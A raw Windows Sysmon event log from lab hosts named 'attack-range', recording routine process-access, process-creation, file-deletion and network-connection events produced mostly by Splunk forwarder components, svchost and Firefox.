14:22:52.499{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045084Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:52.499{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045083Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:52.499{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045082Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:52.499{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045081Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:52.499{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-193C-629A-3D07-000000006002}1508C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045080Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:52.499{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-193C-629A-3D07-000000006002}1508C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045079Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:52.500{0A5DF930-193C-629A-3D07-000000006002}1508C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000045078Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:52.108{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D28DC87EAA901A7DCEDECE86F3C2A9A4,SHA256=D25A554CFD2D3690FBB1BD3F17D7CF885886DF0E2CD45D2B70A0F532E6F64E9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045092Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:53.202{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E024DC0EFAEBCE91A033A9D019D5163,SHA256=4DD225B46B14D9BE486EA33C3B65968C18423F4CCA95F903AC46EBC2DB8EAA6C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:50.749{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56442-false10.0.1.12-8000- 23542300x800000000000000045093Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:54.296{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C9E59557EF6AA9A6A6D3ADC6A96980E,SHA256=31321AC60277B6448E2B0BA6BB4943972AA0BE27BE6F308500DFE5F2E3F01503,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:54.499{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\glean\db\data.safe.binMD5=8B11FDB8761FEE58CFBF7A144C75F477,SHA256=5C8A7BFC0FE72A9B93FBB71B080996C8EF0463EE0824D757FE3D8D577F3DDDE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:54.018{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BF02F30E97E541C8543735155A28AD9,SHA256=99BD54084973B4376DE9D5BFBBB815BB1D34B449C29CD36508E1338BB1E10ED0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045094Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:55.390{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6191DCEF20315C328E6C50A424BE019,SHA256=750A1839B045A36CBE614DA6111F0967B655451AF74D1A0E6EE648534F746046,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:55.067{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3464B1C54B627D42A50DACAE656D8E8D,SHA256=D2D243DD10C7E501A8865469B7E9377C62905123A36C9D07CF9EA4FAF3C4BEF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045095Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:56.483{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63926572F765CEB149F5C4C52F7D41BA,SHA256=88236EAC568535CDBBCD8B1FBBBFF57A4DEDC278B180B011EBF59AA45918E4F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:56.098{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84F3BB4F3ADC13FCD92B5256EC4823E5,SHA256=0D51DDB64217DBC5CF20DFEBAD9919C363F3C22BE944E4F742E7A47F6A0A50B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:57.216{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5D8262D0F402DA28E89DF0B628A5775,SHA256=F25D44B5088CB86804B1DE359C028BE408710F4226AD05353BF92E1631007454,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045096Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:54.736{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52401-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000-